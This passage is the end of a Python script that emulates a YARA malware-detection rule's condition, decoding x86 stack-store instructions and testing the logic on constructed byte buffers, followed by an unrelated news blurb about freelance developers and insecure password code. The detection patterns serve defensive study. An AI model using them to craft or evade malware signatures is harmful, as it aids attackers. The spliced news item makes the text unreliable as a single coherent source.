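    mz_at_0 = match_at(data, parse_hex_pattern(MZ_PATTERN), 0)
    all_x = all(find_pattern(data, parse_hex_pattern(p)) >= 0 for p in X_PATTERNS)
    all_y = all(find_pattern(data, parse_hex_pattern(p)) >= 0 for p in Y_PATTERNS)
    return mz_at_0 and (all_x or all_y)


def decode_stack_byte_store(data: bytes, off: int) -> tuple[int, int]:
    """Decode C6 84 24 <disp32> <imm8> at off into (displacement, stored byte)."""
    if data[off:off + 3] != b"\xC6\x84\x24":
        raise ValueError("not a mov byte ptr [esp+disp32], imm8 encoding")
    return int.from_bytes(data[off + 3:off + 7], "little"), data[off + 7]


def _stack_store(disp: int, imm: int) -> bytes:
    """Assemble mov byte ptr [esp+disp32], imm8 (used only to build test input)."""
    return b"\xC6\x84\x24" + disp.to_bytes(4, "little") + bytes([imm])


# Constructed buffers, not real samples: an MZ stub, filler, then either the
# six stack stores the $x group looks for or the $y counting loop.
_STORES = [_stack_store(0x10 + i, imm)
           for i, imm in enumerate((0x8C, 0x1A, 0xD4, 0x03, 0xB4, 0x80))]
SAMPLE_X = b"MZ" + b"\x00" * 30 + b"".join(_STORES) + b"\xCC" * 4
SAMPLE_PARTIAL = b"MZ" + b"\x00" * 30 + b"".join(_STORES[:5])
SAMPLE_Y = b"MZ" + b"\x00" * 30 + bytes.fromhex(
    "B800E1F505" "895C240C" "FF44240C" "3944240C" "BF0000A000")

if __name__ == "__main__":
    for name, buf in (("SAMPLE_X", SAMPLE_X), ("SAMPLE_Y", SAMPLE_Y),
                      ("SAMPLE_PARTIAL", SAMPLE_PARTIAL), ("no MZ", SAMPLE_Y[2:])):
        print(f"{name:15s} matches: {matches_predator_rule(buf)}")
```

The partial sample shows why the rule uses `all of` rather than a count: five of the six stack stores are not enough, and a buffer without `MZ` at offset 0 never matches however many patterns it contains. For production use the real Yara engine is the right tool; the point here is to make the condition logic and the byte semantics legible.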

Freelance devs: Oh, you wanted the app to be secure? The job spec didn't mention that

The Register - Anti-Virus - 11 March, 2019 - 07:14
Boffins find pros-for-hire no better at writing secure code than compsci beginners

Freelance developers hired to implement password-based security systems do so about as effectively as computer science students, which is to say not very well at all.…
